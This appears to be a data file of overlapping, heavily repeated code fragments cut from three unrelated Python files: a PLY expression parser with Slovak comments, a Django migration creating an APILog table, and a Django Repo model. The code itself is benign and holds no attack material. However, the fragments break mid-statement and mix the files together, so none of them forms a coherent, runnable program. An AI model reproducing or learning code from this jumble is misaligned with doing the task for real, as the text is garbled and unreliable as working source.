"parser.parse(expression) if global_var.parseerror: # ak chyba global_var.parseerror = False # reset flagu return",
"| '-' x exp2 | '*' x exp2 | '/' x exp2 |",
"vypnutie debugovacieho suboru # kontrola lexemov lexer.input(expression) while True: tok = lexer.token() if",
"FIELD''' global_var.fields.append(p[1]) # pridanie fieldu do listu fieldov # ak chyba v gramatike",
"p: print(\"Syntakticka chyba pri '%s'\" % p.value) global_var.parseerror = True else: print(\"Syntakticka chyba",
"x exp2 | '-' x exp2 | '*' x exp2 | '/' x",
"= True else: print(\"Syntakticka chyba pri EOF\") global_var.parseerror = True # funkcia na",
"exp2 | '/' x exp2 | ''' def p_x1(p): '''x : NUMBER''' def",
"( 'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ', ) # literaly literals =",
"tokenov tokens = ( 'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ', ) #",
"znak '%s'\" % t.value[0]) global_var.parseerror = True t.lexer.skip(1) # gramatika def p_inp(p): '''inp",
"v gramatike vypise sa chyba, nastavi sa globalna premenna na urcenie chyby def",
"vypise sa chyba, nastavi sa globalna premenna na urcenie chyby def p_error(p): if",
"chyba pri '%s'\" % p.value) global_var.parseerror = True else: print(\"Syntakticka chyba pri EOF\")",
"tokens = ( 'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ', ) # literaly",
"lexemu a parseru # vstupom je vyraz, pri lexikalnej alebo syntaktickej chybe vrati",
"lexer.input(expression) while True: tok = lexer.token() if global_var.parseerror: # ak chyba global_var.parseerror =",
"yacc import global_var # definicie tokenov tokens = ( 'STRING', 'NUMBER', 'FIELD', 'GRE',",
"print(\"Nepodporovany znak '%s'\" % t.value[0]) global_var.parseerror = True t.lexer.skip(1) # gramatika def p_inp(p):",
"'EQ', 'NEQ', ) # literaly literals = ['+', '-', '*', '/', '>', '<']",
"as lex import ply.yacc as yacc import global_var # definicie tokenov tokens =",
"False if not tok: break # syntakticka kontrola parser.parse(expression) if global_var.parseerror: # ak",
"'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ', ) # literaly literals = ['+', '-',",
"p_inp(p): '''inp : exp '>' exp | exp '<' exp | exp GRE",
"exp '<' exp | exp GRE exp | exp LOE exp | exp",
"# gramatika def p_inp(p): '''inp : exp '>' exp | exp '<' exp",
"True t.lexer.skip(1) # gramatika def p_inp(p): '''inp : exp '>' exp | exp",
"def p_exp(p): '''exp : STRING | x exp2''' def p_exp2(p): '''exp2 : '+'",
"chyba global_var.parseerror = False # reset flagu return False if not tok: break",
"= r'\\\".*\\\"' t_GRE = '>=' t_LOE = '<=' t_EQ = '==' t_NEQ =",
"parser = yacc.yacc(debug=False) # vypnutie debugovacieho suboru # kontrola lexemov lexer.input(expression) while True:",
"'-', '*', '/', '>', '<'] # popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING =",
"gramatike vypise sa chyba, nastavi sa globalna premenna na urcenie chyby def p_error(p):",
"if p: print(\"Syntakticka chyba pri '%s'\" % p.value) global_var.parseerror = True else: print(\"Syntakticka",
"int(t.value) return t # chybny token def t_error(t): print(\"Nepodporovany znak '%s'\" % t.value[0])",
"'''x : NUMBER''' def p_x2(p): '''x : FIELD''' global_var.fields.append(p[1]) # pridanie fieldu do",
"# kontrola lexemov lexer.input(expression) while True: tok = lexer.token() if global_var.parseerror: # ak",
"'<=' t_EQ = '==' t_NEQ = '!=' t_ignore = \" \\t\" def t_NUMBER(t):",
"GRE exp | exp LOE exp | exp NEQ exp | exp EQ",
"x exp2 | ''' def p_x1(p): '''x : NUMBER''' def p_x2(p): '''x :",
"'%s'\" % t.value[0]) global_var.parseerror = True t.lexer.skip(1) # gramatika def p_inp(p): '''inp :",
"def p_x2(p): '''x : FIELD''' global_var.fields.append(p[1]) # pridanie fieldu do listu fieldov #",
"'/' x exp2 | ''' def p_x1(p): '''x : NUMBER''' def p_x2(p): '''x",
"# ak chyba global_var.parseerror = False # reset flagu return False if not",
"t_ignore = \" \\t\" def t_NUMBER(t): r'\\d+' t.value = int(t.value) return t #",
"r'\\d+' t.value = int(t.value) return t # chybny token def t_error(t): print(\"Nepodporovany znak",
"LOE exp | exp NEQ exp | exp EQ exp''' def p_exp(p): '''exp",
"= False # reset flagu return False if not tok: break # syntakticka",
": exp '>' exp | exp '<' exp | exp GRE exp |",
"chyba, nastavi sa globalna premenna na urcenie chyby def p_error(p): if p: print(\"Syntakticka",
"= True # funkcia na zostavenie lexemu a parseru # vstupom je vyraz,",
"tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE = '>=' t_LOE = '<='",
"globalna premenna na urcenie chyby def p_error(p): if p: print(\"Syntakticka chyba pri '%s'\"",
"\" \\t\" def t_NUMBER(t): r'\\d+' t.value = int(t.value) return t # chybny token",
"= lex.lex() parser = yacc.yacc(debug=False) # vypnutie debugovacieho suboru # kontrola lexemov lexer.input(expression)",
"ply.lex as lex import ply.yacc as yacc import global_var # definicie tokenov tokens",
"= \" \\t\" def t_NUMBER(t): r'\\d+' t.value = int(t.value) return t # chybny",
"| exp '<' exp | exp GRE exp | exp LOE exp |",
"'-' x exp2 | '*' x exp2 | '/' x exp2 | '''",
"vstupom je vyraz, pri lexikalnej alebo syntaktickej chybe vrati False, inak True def",
"'>' exp | exp '<' exp | exp GRE exp | exp LOE",
"| exp GRE exp | exp LOE exp | exp NEQ exp |",
"je vyraz, pri lexikalnej alebo syntaktickej chybe vrati False, inak True def myparse(expression):",
"chybe vrati False, inak True def myparse(expression): lexer = lex.lex() parser = yacc.yacc(debug=False)",
": FIELD''' global_var.fields.append(p[1]) # pridanie fieldu do listu fieldov # ak chyba v",
"exp '>' exp | exp '<' exp | exp GRE exp | exp",
"def p_error(p): if p: print(\"Syntakticka chyba pri '%s'\" % p.value) global_var.parseerror = True",
"import ply.lex as lex import ply.yacc as yacc import global_var # definicie tokenov",
"as yacc import global_var # definicie tokenov tokens = ( 'STRING', 'NUMBER', 'FIELD',",
"# popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE = '>=' t_LOE",
"def p_inp(p): '''inp : exp '>' exp | exp '<' exp | exp",
"sa globalna premenna na urcenie chyby def p_error(p): if p: print(\"Syntakticka chyba pri",
"tok: break # syntakticka kontrola parser.parse(expression) if global_var.parseerror: # ak chyba global_var.parseerror =",
"t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE = '>=' t_LOE = '<=' t_EQ",
"global_var # definicie tokenov tokens = ( 'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ',",
"'/', '>', '<'] # popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE",
"exp GRE exp | exp LOE exp | exp NEQ exp | exp",
"kontrola parser.parse(expression) if global_var.parseerror: # ak chyba global_var.parseerror = False # reset flagu",
"r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE = '>=' t_LOE = '<=' t_EQ = '=='",
"True else: print(\"Syntakticka chyba pri EOF\") global_var.parseerror = True # funkcia na zostavenie",
"print(\"Syntakticka chyba pri EOF\") global_var.parseerror = True # funkcia na zostavenie lexemu a",
"yacc.yacc(debug=False) # vypnutie debugovacieho suboru # kontrola lexemov lexer.input(expression) while True: tok =",
"exp2 | ''' def p_x1(p): '''x : NUMBER''' def p_x2(p): '''x : FIELD'''",
"t_STRING = r'\\\".*\\\"' t_GRE = '>=' t_LOE = '<=' t_EQ = '==' t_NEQ",
"| x exp2''' def p_exp2(p): '''exp2 : '+' x exp2 | '-' x",
"pri EOF\") global_var.parseerror = True # funkcia na zostavenie lexemu a parseru #",
"'<' exp | exp GRE exp | exp LOE exp | exp NEQ",
"# definicie tokenov tokens = ( 'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ',",
"'NEQ', ) # literaly literals = ['+', '-', '*', '/', '>', '<'] #",
"# reset flagu return False if not tok: break # syntakticka kontrola parser.parse(expression)",
"t.lexer.skip(1) # gramatika def p_inp(p): '''inp : exp '>' exp | exp '<'",
"na urcenie chyby def p_error(p): if p: print(\"Syntakticka chyba pri '%s'\" % p.value)",
"= ( 'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ', ) # literaly literals",
"kontrola lexemov lexer.input(expression) while True: tok = lexer.token() if global_var.parseerror: # ak chyba",
"% t.value[0]) global_var.parseerror = True t.lexer.skip(1) # gramatika def p_inp(p): '''inp : exp",
"x exp2 | '/' x exp2 | ''' def p_x1(p): '''x : NUMBER'''",
"r'\\\".*\\\"' t_GRE = '>=' t_LOE = '<=' t_EQ = '==' t_NEQ = '!='",
"| exp EQ exp''' def p_exp(p): '''exp : STRING | x exp2''' def",
"\\t\" def t_NUMBER(t): r'\\d+' t.value = int(t.value) return t # chybny token def",
"def p_exp2(p): '''exp2 : '+' x exp2 | '-' x exp2 | '*'",
"'==' t_NEQ = '!=' t_ignore = \" \\t\" def t_NUMBER(t): r'\\d+' t.value =",
"p.value) global_var.parseerror = True else: print(\"Syntakticka chyba pri EOF\") global_var.parseerror = True #",
"'GRE', 'LOE', 'EQ', 'NEQ', ) # literaly literals = ['+', '-', '*', '/',",
"EOF\") global_var.parseerror = True # funkcia na zostavenie lexemu a parseru # vstupom",
"x exp2''' def p_exp2(p): '''exp2 : '+' x exp2 | '-' x exp2",
"global_var.parseerror = True t.lexer.skip(1) # gramatika def p_inp(p): '''inp : exp '>' exp",
"global_var.parseerror = True # funkcia na zostavenie lexemu a parseru # vstupom je",
"= True t.lexer.skip(1) # gramatika def p_inp(p): '''inp : exp '>' exp |",
"global_var.parseerror: # ak chyba global_var.parseerror = False # reset flagu return False return",
"t_GRE = '>=' t_LOE = '<=' t_EQ = '==' t_NEQ = '!=' t_ignore",
"t.value[0]) global_var.parseerror = True t.lexer.skip(1) # gramatika def p_inp(p): '''inp : exp '>'",
"'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ', ) # literaly literals = ['+', '-', '*',",
"EQ exp''' def p_exp(p): '''exp : STRING | x exp2''' def p_exp2(p): '''exp2",
"p_x2(p): '''x : FIELD''' global_var.fields.append(p[1]) # pridanie fieldu do listu fieldov # ak",
"STRING | x exp2''' def p_exp2(p): '''exp2 : '+' x exp2 | '-'",
"| exp LOE exp | exp NEQ exp | exp EQ exp''' def",
"def t_NUMBER(t): r'\\d+' t.value = int(t.value) return t # chybny token def t_error(t):",
"= '>=' t_LOE = '<=' t_EQ = '==' t_NEQ = '!=' t_ignore =",
"exp | exp EQ exp''' def p_exp(p): '''exp : STRING | x exp2'''",
"True: tok = lexer.token() if global_var.parseerror: # ak chyba global_var.parseerror = False #",
"True def myparse(expression): lexer = lex.lex() parser = yacc.yacc(debug=False) # vypnutie debugovacieho suboru",
"syntakticka kontrola parser.parse(expression) if global_var.parseerror: # ak chyba global_var.parseerror = False # reset",
"= yacc.yacc(debug=False) # vypnutie debugovacieho suboru # kontrola lexemov lexer.input(expression) while True: tok",
"t_NEQ = '!=' t_ignore = \" \\t\" def t_NUMBER(t): r'\\d+' t.value = int(t.value)",
"sa chyba, nastavi sa globalna premenna na urcenie chyby def p_error(p): if p:",
"'''x : FIELD''' global_var.fields.append(p[1]) # pridanie fieldu do listu fieldov # ak chyba",
"| '*' x exp2 | '/' x exp2 | ''' def p_x1(p): '''x",
"False # reset flagu return False if not tok: break # syntakticka kontrola",
"'+' x exp2 | '-' x exp2 | '*' x exp2 | '/'",
"lexer = lex.lex() parser = yacc.yacc(debug=False) # vypnutie debugovacieho suboru # kontrola lexemov",
"tok = lexer.token() if global_var.parseerror: # ak chyba global_var.parseerror = False # reset",
"ply.yacc as yacc import global_var # definicie tokenov tokens = ( 'STRING', 'NUMBER',",
"token def t_error(t): print(\"Nepodporovany znak '%s'\" % t.value[0]) global_var.parseerror = True t.lexer.skip(1) #",
"t.value = int(t.value) return t # chybny token def t_error(t): print(\"Nepodporovany znak '%s'\"",
": NUMBER''' def p_x2(p): '''x : FIELD''' global_var.fields.append(p[1]) # pridanie fieldu do listu",
"vrati False, inak True def myparse(expression): lexer = lex.lex() parser = yacc.yacc(debug=False) #",
"if global_var.parseerror: # ak chyba global_var.parseerror = False # reset flagu return False",
"| exp NEQ exp | exp EQ exp''' def p_exp(p): '''exp : STRING",
"print(\"Syntakticka chyba pri '%s'\" % p.value) global_var.parseerror = True else: print(\"Syntakticka chyba pri",
"# vypnutie debugovacieho suboru # kontrola lexemov lexer.input(expression) while True: tok = lexer.token()",
"fieldu do listu fieldov # ak chyba v gramatike vypise sa chyba, nastavi",
"chyby def p_error(p): if p: print(\"Syntakticka chyba pri '%s'\" % p.value) global_var.parseerror =",
"False, inak True def myparse(expression): lexer = lex.lex() parser = yacc.yacc(debug=False) # vypnutie",
"myparse(expression): lexer = lex.lex() parser = yacc.yacc(debug=False) # vypnutie debugovacieho suboru # kontrola",
"return False if not tok: break # syntakticka kontrola parser.parse(expression) if global_var.parseerror: #",
"def t_error(t): print(\"Nepodporovany znak '%s'\" % t.value[0]) global_var.parseerror = True t.lexer.skip(1) # gramatika",
"exp | exp NEQ exp | exp EQ exp''' def p_exp(p): '''exp :",
"lexemov lexer.input(expression) while True: tok = lexer.token() if global_var.parseerror: # ak chyba global_var.parseerror",
"debugovacieho suboru # kontrola lexemov lexer.input(expression) while True: tok = lexer.token() if global_var.parseerror:",
"t # chybny token def t_error(t): print(\"Nepodporovany znak '%s'\" % t.value[0]) global_var.parseerror =",
"else: print(\"Syntakticka chyba pri EOF\") global_var.parseerror = True # funkcia na zostavenie lexemu",
"na zostavenie lexemu a parseru # vstupom je vyraz, pri lexikalnej alebo syntaktickej",
"'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ', ) # literaly literals = ['+',",
"= r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE = '>=' t_LOE = '<=' t_EQ =",
"global_var.parseerror: # ak chyba global_var.parseerror = False # reset flagu return False if",
"lex import ply.yacc as yacc import global_var # definicie tokenov tokens = (",
"while True: tok = lexer.token() if global_var.parseerror: # ak chyba global_var.parseerror = False",
"p_error(p): if p: print(\"Syntakticka chyba pri '%s'\" % p.value) global_var.parseerror = True else:",
"global_var.parseerror = True else: print(\"Syntakticka chyba pri EOF\") global_var.parseerror = True # funkcia",
"urcenie chyby def p_error(p): if p: print(\"Syntakticka chyba pri '%s'\" % p.value) global_var.parseerror",
"t_EQ = '==' t_NEQ = '!=' t_ignore = \" \\t\" def t_NUMBER(t): r'\\d+'",
"exp EQ exp''' def p_exp(p): '''exp : STRING | x exp2''' def p_exp2(p):",
"| ''' def p_x1(p): '''x : NUMBER''' def p_x2(p): '''x : FIELD''' global_var.fields.append(p[1])",
"exp LOE exp | exp NEQ exp | exp EQ exp''' def p_exp(p):",
"flagu return False if not tok: break # syntakticka kontrola parser.parse(expression) if global_var.parseerror:",
"'''exp2 : '+' x exp2 | '-' x exp2 | '*' x exp2",
"literals = ['+', '-', '*', '/', '>', '<'] # popis tokenov t_FIELD =",
"do listu fieldov # ak chyba v gramatike vypise sa chyba, nastavi sa",
"lex.lex() parser = yacc.yacc(debug=False) # vypnutie debugovacieho suboru # kontrola lexemov lexer.input(expression) while",
": '+' x exp2 | '-' x exp2 | '*' x exp2 |",
"t_NUMBER(t): r'\\d+' t.value = int(t.value) return t # chybny token def t_error(t): print(\"Nepodporovany",
"exp | exp GRE exp | exp LOE exp | exp NEQ exp",
"x exp2 | '*' x exp2 | '/' x exp2 | ''' def",
"exp''' def p_exp(p): '''exp : STRING | x exp2''' def p_exp2(p): '''exp2 :",
"t_error(t): print(\"Nepodporovany znak '%s'\" % t.value[0]) global_var.parseerror = True t.lexer.skip(1) # gramatika def",
"'<'] # popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE = '>='",
"pri '%s'\" % p.value) global_var.parseerror = True else: print(\"Syntakticka chyba pri EOF\") global_var.parseerror",
"syntaktickej chybe vrati False, inak True def myparse(expression): lexer = lex.lex() parser =",
"= '!=' t_ignore = \" \\t\" def t_NUMBER(t): r'\\d+' t.value = int(t.value) return",
": STRING | x exp2''' def p_exp2(p): '''exp2 : '+' x exp2 |",
"lexer.token() if global_var.parseerror: # ak chyba global_var.parseerror = False # reset flagu return",
"ak chyba global_var.parseerror = False # reset flagu return False if not tok:",
"fieldov # ak chyba v gramatike vypise sa chyba, nastavi sa globalna premenna",
"p_x1(p): '''x : NUMBER''' def p_x2(p): '''x : FIELD''' global_var.fields.append(p[1]) # pridanie fieldu",
"# pridanie fieldu do listu fieldov # ak chyba v gramatike vypise sa",
"exp | exp LOE exp | exp NEQ exp | exp EQ exp'''",
"['+', '-', '*', '/', '>', '<'] # popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING",
"p_exp(p): '''exp : STRING | x exp2''' def p_exp2(p): '''exp2 : '+' x",
"import ply.yacc as yacc import global_var # definicie tokenov tokens = ( 'STRING',",
"| '/' x exp2 | ''' def p_x1(p): '''x : NUMBER''' def p_x2(p):",
"not tok: break # syntakticka kontrola parser.parse(expression) if global_var.parseerror: # ak chyba global_var.parseerror",
"# ak chyba global_var.parseerror = False # reset flagu return False return True",
"'>=' t_LOE = '<=' t_EQ = '==' t_NEQ = '!=' t_ignore = \"",
"'>', '<'] # popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE =",
"# literaly literals = ['+', '-', '*', '/', '>', '<'] # popis tokenov",
") # literaly literals = ['+', '-', '*', '/', '>', '<'] # popis",
"= ['+', '-', '*', '/', '>', '<'] # popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*'",
"nastavi sa globalna premenna na urcenie chyby def p_error(p): if p: print(\"Syntakticka chyba",
"pri lexikalnej alebo syntaktickej chybe vrati False, inak True def myparse(expression): lexer =",
"chyba v gramatike vypise sa chyba, nastavi sa globalna premenna na urcenie chyby",
"% p.value) global_var.parseerror = True else: print(\"Syntakticka chyba pri EOF\") global_var.parseerror = True",
"def p_x1(p): '''x : NUMBER''' def p_x2(p): '''x : FIELD''' global_var.fields.append(p[1]) # pridanie",
"import global_var # definicie tokenov tokens = ( 'STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE',",
"'LOE', 'EQ', 'NEQ', ) # literaly literals = ['+', '-', '*', '/', '>',",
"exp2 | '-' x exp2 | '*' x exp2 | '/' x exp2",
"exp | exp '<' exp | exp GRE exp | exp LOE exp",
"t_LOE = '<=' t_EQ = '==' t_NEQ = '!=' t_ignore = \" \\t\"",
"gramatika def p_inp(p): '''inp : exp '>' exp | exp '<' exp |",
"return t # chybny token def t_error(t): print(\"Nepodporovany znak '%s'\" % t.value[0]) global_var.parseerror",
"a parseru # vstupom je vyraz, pri lexikalnej alebo syntaktickej chybe vrati False,",
"alebo syntaktickej chybe vrati False, inak True def myparse(expression): lexer = lex.lex() parser",
"def myparse(expression): lexer = lex.lex() parser = yacc.yacc(debug=False) # vypnutie debugovacieho suboru #",
"chybny token def t_error(t): print(\"Nepodporovany znak '%s'\" % t.value[0]) global_var.parseerror = True t.lexer.skip(1)",
"# syntakticka kontrola parser.parse(expression) if global_var.parseerror: # ak chyba global_var.parseerror = False #",
"listu fieldov # ak chyba v gramatike vypise sa chyba, nastavi sa globalna",
"'!=' t_ignore = \" \\t\" def t_NUMBER(t): r'\\d+' t.value = int(t.value) return t",
"popis tokenov t_FIELD = r'[a-zA-Z0-9_\\.][a-zA-Z0-9_\\.]*' t_STRING = r'\\\".*\\\"' t_GRE = '>=' t_LOE ="
] |
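The row above applies the same treatment to a small PLY expression checker whose comments are in Slovak. Reassembled, with comments and error messages translated to English, the module looks like the sketch below; `global_var` (carrying the `parseerror` flag and the `fields` list) is the original project's shared-state module and is assumed here as-is.

```python
# Sketch reassembled from the shingles above; comments and messages are
# translated from Slovak. global_var (with .parseerror and .fields) is the
# original project's shared-state module, assumed here.
import ply.lex as lex
import ply.yacc as yacc
import global_var

# token definitions
tokens = ('STRING', 'NUMBER', 'FIELD', 'GRE', 'LOE', 'EQ', 'NEQ')
# literals
literals = ['+', '-', '*', '/', '>', '<']
# token descriptions
t_FIELD = r'[a-zA-Z0-9_\.][a-zA-Z0-9_\.]*'
t_STRING = r'\".*\"'
t_GRE = '>='
t_LOE = '<='
t_EQ = '=='
t_NEQ = '!='
t_ignore = " \t"

def t_NUMBER(t):
    r'\d+'
    t.value = int(t.value)
    return t

# invalid token
def t_error(t):
    print("Unsupported character '%s'" % t.value[0])
    global_var.parseerror = True
    t.lexer.skip(1)

# grammar
def p_inp(p):
    '''inp : exp '>' exp
           | exp '<' exp
           | exp GRE exp
           | exp LOE exp
           | exp NEQ exp
           | exp EQ exp'''

def p_exp(p):
    '''exp : STRING
           | x exp2'''

def p_exp2(p):
    '''exp2 : '+' x exp2
            | '-' x exp2
            | '*' x exp2
            | '/' x exp2
            |'''

def p_x1(p):
    '''x : NUMBER'''

def p_x2(p):
    '''x : FIELD'''
    global_var.fields.append(p[1])  # record the field name in the list of fields

# on a grammar error, print it and set the global error flag
def p_error(p):
    if p:
        print("Syntax error at '%s'" % p.value)
    else:
        print("Syntax error at EOF")
    global_var.parseerror = True

# build the lexer and parser; takes an expression, returns False on a
# lexical or syntactic error, True otherwise
def myparse(expression):
    lexer = lex.lex()
    parser = yacc.yacc(debug=False)  # turn off the debug file
    # lexical check
    lexer.input(expression)
    while True:
        tok = lexer.token()
        if global_var.parseerror:          # on error
            global_var.parseerror = False  # reset the flag
            return False
        if not tok:
            break
    # syntactic check
    parser.parse(expression)
    if global_var.parseerror:          # on error
        global_var.parseerror = False  # reset the flag
        return False
    return True
```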
[
"typing import List from django.db import migrations, models class Migration(migrations.Migration): dependencies: List[str] =",
"= [] operations = [ migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),",
"[ migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)),",
"= [ migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id',",
"migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key',",
"django.db import migrations, models class Migration(migrations.Migration): dependencies: List[str] = [] operations = [",
"import migrations, models class Migration(migrations.Migration): dependencies: List[str] = [] operations = [ migrations.CreateModel(",
"verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key', models.CharField(max_length=64)), ('url', models.URLField()), ('method', models.CharField(max_length=10)), ], ),",
"<filename>cloudcix_rest/migrations/0001_initial.py # Generated by Django 2.0.7 on 2018-07-09 13:50 from typing import List",
"from typing import List from django.db import migrations, models class Migration(migrations.Migration): dependencies: List[str]",
"name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key', models.CharField(max_length=64)),",
"serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key', models.CharField(max_length=64)), ('url', models.URLField()), ('method', models.CharField(max_length=10)), ],",
"primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key', models.CharField(max_length=64)), ('url', models.URLField()), ('method', models.CharField(max_length=10)),",
"13:50 from typing import List from django.db import migrations, models class Migration(migrations.Migration): dependencies:",
"class Migration(migrations.Migration): dependencies: List[str] = [] operations = [ migrations.CreateModel( name='APILog', fields=[ ('id',",
"by Django 2.0.7 on 2018-07-09 13:50 from typing import List from django.db import",
"on 2018-07-09 13:50 from typing import List from django.db import migrations, models class",
"Django 2.0.7 on 2018-07-09 13:50 from typing import List from django.db import migrations,",
"migrations, models class Migration(migrations.Migration): dependencies: List[str] = [] operations = [ migrations.CreateModel( name='APILog',",
"models class Migration(migrations.Migration): dependencies: List[str] = [] operations = [ migrations.CreateModel( name='APILog', fields=[",
"from django.db import migrations, models class Migration(migrations.Migration): dependencies: List[str] = [] operations =",
"# Generated by Django 2.0.7 on 2018-07-09 13:50 from typing import List from",
"models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key', models.CharField(max_length=64)), ('url', models.URLField()), ('method',",
"('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key', models.CharField(max_length=64)), ('url', models.URLField()), ('method', models.CharField(max_length=10)), ], ), ]",
"[] operations = [ migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime',",
"import List from django.db import migrations, models class Migration(migrations.Migration): dependencies: List[str] = []",
"2018-07-09 13:50 from typing import List from django.db import migrations, models class Migration(migrations.Migration):",
"operations = [ migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)),",
"fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key', models.CharField(max_length=64)), ('url',",
"dependencies: List[str] = [] operations = [ migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True,",
"2.0.7 on 2018-07-09 13:50 from typing import List from django.db import migrations, models",
"List[str] = [] operations = [ migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False,",
"List from django.db import migrations, models class Migration(migrations.Migration): dependencies: List[str] = [] operations",
"Generated by Django 2.0.7 on 2018-07-09 13:50 from typing import List from django.db",
"('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('datetime', models.DateTimeField(auto_now_add=True)), ('user_id', models.CharField(max_length=64)), ('api_key', models.CharField(max_length=64)), ('url', models.URLField()),",
"Migration(migrations.Migration): dependencies: List[str] = [] operations = [ migrations.CreateModel( name='APILog', fields=[ ('id', models.AutoField(auto_created=True,"
] |
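This row shingles a Django migration whose header names it `cloudcix_rest/migrations/0001_initial.py`, generated by Django 2.0.7 on 2018-07-09. The content is fully recoverable from the overlaps; reassembled it reads:

```python
# Generated by Django 2.0.7 on 2018-07-09 13:50
# (reassembled from the shingles above)
from typing import List

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies: List[str] = []

    operations = [
        migrations.CreateModel(
            name='APILog',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('datetime', models.DateTimeField(auto_now_add=True)),
                ('user_id', models.CharField(max_length=64)),
                ('api_key', models.CharField(max_length=64)),
                ('url', models.URLField()),
                ('method', models.CharField(max_length=10)),
            ],
        ),
    ]
```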
[
"from django.db import models class Repo(models.Model): repo_url = models.URLField(max_length=200) owner = models.CharField(max_length=200) repo",
"= models.URLField(max_length=200) owner = models.CharField(max_length=200) repo = models.CharField(max_length=200) def __unicode__(self): return self.owner +",
"models.URLField(max_length=200) owner = models.CharField(max_length=200) repo = models.CharField(max_length=200) def __unicode__(self): return self.owner + '/'",
"owner = models.CharField(max_length=200) repo = models.CharField(max_length=200) def __unicode__(self): return self.owner + '/' +",
"django.db import models class Repo(models.Model): repo_url = models.URLField(max_length=200) owner = models.CharField(max_length=200) repo =",
"class Repo(models.Model): repo_url = models.URLField(max_length=200) owner = models.CharField(max_length=200) repo = models.CharField(max_length=200) def __unicode__(self):",
"models class Repo(models.Model): repo_url = models.URLField(max_length=200) owner = models.CharField(max_length=200) repo = models.CharField(max_length=200) def",
"repo_url = models.URLField(max_length=200) owner = models.CharField(max_length=200) repo = models.CharField(max_length=200) def __unicode__(self): return self.owner",
"<reponame>billryan/github-rss from django.db import models class Repo(models.Model): repo_url = models.URLField(max_length=200) owner = models.CharField(max_length=200)",
"= models.CharField(max_length=200) repo = models.CharField(max_length=200) def __unicode__(self): return self.owner + '/' + self.repo",
"import models class Repo(models.Model): repo_url = models.URLField(max_length=200) owner = models.CharField(max_length=200) repo = models.CharField(max_length=200)",
"Repo(models.Model): repo_url = models.URLField(max_length=200) owner = models.CharField(max_length=200) repo = models.CharField(max_length=200) def __unicode__(self): return"
] |
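Likewise, this short row is a single Django model from the repo tagged `billryan/github-rss`; reassembled:

```python
# Reassembled from the shingles above (billryan/github-rss).
from django.db import models


class Repo(models.Model):
    repo_url = models.URLField(max_length=200)
    owner = models.CharField(max_length=200)
    repo = models.CharField(max_length=200)

    def __unicode__(self):  # Python 2-era Django string representation
        return self.owner + '/' + self.repo
```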
[
